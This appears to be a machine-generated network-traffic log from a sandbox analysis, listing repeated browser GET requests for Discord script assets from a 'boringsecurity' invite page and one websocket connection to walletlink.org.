Source: global trafficHTTP traffic detected: GET /assets/47470.c4ab7647d25b8ac58ca8.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/boringsecurityAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=L2cdwzEiZXRsWVQDn5J7qG2EKtpfMxMPTt5WH8bmYfk-1702226710451-0-604800000
Source: global trafficHTTP traffic detected: GET /assets/22843.1bda3edd4dd152273661.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/boringsecurityAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=L2cdwzEiZXRsWVQDn5J7qG2EKtpfMxMPTt5WH8bmYfk-1702226710451-0-604800000
Source: global trafficHTTP traffic detected: GET /assets/94288.dbd73ecb6b1482a870b7.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/boringsecurityAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=aDxqWxmtKzcKeNc4IMfmcFpoMNSAUV.5pLaNR6SS2V8-1702226710633-0-604800000
Source: global trafficHTTP traffic detected: GET /assets/25653.f1981721227784f0166e.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/boringsecurityAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=aDxqWxmtKzcKeNc4IMfmcFpoMNSAUV.5pLaNR6SS2V8-1702226710633-0-604800000
Source: global trafficHTTP traffic detected: GET /assets/13942.42b3309fce7f57e5eb63.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/boringsecurityAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=aDxqWxmtKzcKeNc4IMfmcFpoMNSAUV.5pLaNR6SS2V8-1702226710633-0-604800000
Source: global trafficHTTP traffic detected: GET /assets/65573.3d56d56002765d7a9da8.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/boringsecurityAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=iPV1oQiQt2oU29PR.swfFDIqezKDMluAOxho46Dsr7E-1702226711023-0-604800000
Source: global trafficHTTP traffic detected: GET /assets/14875.ab7170b144439cba21c6.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/boringsecurityAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=iPV1oQiQt2oU29PR.swfFDIqezKDMluAOxho46Dsr7E-1702226711023-0-604800000
Source: global trafficHTTP traffic detected: GET /assets/31717.600d5111130648c4f7c5.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/boringsecurityAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=Et_uvCR2WvAWQCG5sCUDgjP1KgFJjZLYu4tsYqGll50-1702226711217-0-604800000
Source: global trafficHTTP traffic detected: GET /assets/72870.d7e30a37a080f43af084.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/boringsecurityAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=Et_uvCR2WvAWQCG5sCUDgjP1KgFJjZLYu4tsYqGll50-1702226711217-0-604800000
Source: global trafficHTTP traffic detected: GET /assets/83554.2a246a1047818167dc16.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/boringsecurityAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=Et_uvCR2WvAWQCG5sCUDgjP1KgFJjZLYu4tsYqGll50-1702226711217-0-604800000
Source: global trafficHTTP traffic detected: GET /assets/47387.4470209d33fc5d80f673.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/boringsecurityAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=x0HHaR2XrbYyd6oZjMI2mMTQT9We50P4So.cyFMvr_M-1702226711688-0-604800000
Source: global trafficHTTP traffic detected: GET /assets/27057.ee8f9d6f6f76cab31011.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/boringsecurityAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=Pvcmd6a6.0o4HjOJPmeojkgEm6NiaF1BbolJHbj9VMY-1702226711747-0-604800000
Source: global trafficHTTP traffic detected: GET /assets/67079.8c773b08bd63e44275b8.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/boringsecurityAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=Pvcmd6a6.0o4HjOJPmeojkgEm6NiaF1BbolJHbj9VMY-1702226711747-0-604800000
Source: global trafficHTTP traffic detected: GET /rpc HTTP/1.1Host: www.walletlink.orgConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://boringsecurity.comSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Sec-WebSocket-Key: U94YTUq5nYuZCsRsJDBrtA==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
Source: global trafficHTTP traffic detected: GET /assets/34426.aefa163dd8b10b7ac8cc.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/boringsecurityAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=Pvcmd6a6.0o4HjOJPmeojkgEm6NiaF1BbolJHbj9VMY-1702226711747-0-604800000
Source: global trafficHTTP traffic detected: GET /assets/41831.ad048c0163425aea4d2e.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/boringsecurityAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=RZZse.6bbxsMOJ1oPVCsZDXtOAY_lqb8p879sJhPwp4-1702226712142-0-604800000
Source: global trafficHTTP traffic detected: GET /assets/43870.40da167473dc0e9edab1.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/boringsecurityAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=RZZse.6bbxsMOJ1oPVCsZDXtOAY_lqb8p879sJhPwp4-1702226712142-0-604800000
Source: global trafficHTTP traffic detected: GET /assets/21251.68c5f799d8889a16996c.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/boringsecurityAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=RZZse.6bbxsMOJ1oPVCsZDXtOAY_lqb8p879sJhPwp4-1702226712142-0-604800000
Source: global trafficHTTP traffic detected: GET /assets/48590.30373425cc01194cd313.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/boringsecurityAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=RZZse.6bbxsMOJ1oPVCsZDXtOAY_lqb8p879sJhPwp4-1702226712142-0-604800000
Source: global trafficHTTP traffic detected: GET /assets/86480.ebf8826a7f33e22a6aba.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/boringsecurityAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=bwATnPuetc5_VMaNdwJ0_I5jgXIgH6LKeXH8pjFuGGk-1702226712432-0-604800000
Source: global trafficHTTP traffic detected: GET /assets/67615.9ab2f39e6303de9fa164.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/boringsecurityAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=bwATnPuetc5_VMaNdwJ0_I5jgXIgH6LKeXH8pjFuGGk-1702226712432-0-604800000
Source: global trafficHTTP traffic detected: GET /assets/89894.44f49c0018afb3694fe7.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/boringsecurityAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=JtFkKsHo3VvgcjYhOEdECTtnf5Ejj9FWeyq86hpz4Ow-1702226712736-0-604800000
Source: global trafficHTTP traffic detected: GET /assets/8240.865c70ef34cec1e11192.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/boringsecurityAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=JtFkKsHo3VvgcjYhOEdECTtnf5Ejj9FWeyq86hpz4Ow-1702226712736-0-604800000
Source: global trafficHTTP traffic detected: GET /assets/18814.8a9d7b31f5a23de4ecfd.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/boringsecurityAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=JtFkKsHo3VvgcjYhOEdECTtnf5Ejj9FWeyq86hpz4Ow-1702226712736-0-604800000
Source: global trafficHTTP traffic detected: GET /assets/37580.640f5dece69c9284b1ba.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/boringsecurityAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=JtFkKsHo3VvgcjYhOEdECTtnf5Ejj9FWeyq86hpz4Ow-1702226712736-0-604800000
Source: global trafficHTTP traffic detected: GET /assets/69039.0d3b4d5be7f6a21cf93d.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/boringsecurityAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=PR8tshr9UjVkiwvbW3NuaCUWoy3mYYmajVT_M1hNbwY-1702226713054-0-604800000
Source: global trafficHTTP traffic detected: GET /assets/99742.217a8e519977f9b5cbf0.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/boringsecurityAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=PR8tshr9UjVkiwvbW3NuaCUWoy3mYYmajVT_M1hNbwY-1702226713054-0-604800000
Source: global trafficHTTP traffic detected: GET /assets/18407.d0257553d76c1da19de7.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/boringsecurityAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=Uwh5q_mEMGl8qgOKdG_NoZP7zcIvxDvF3mDMx2cCstU-1702226713424-0-604800000
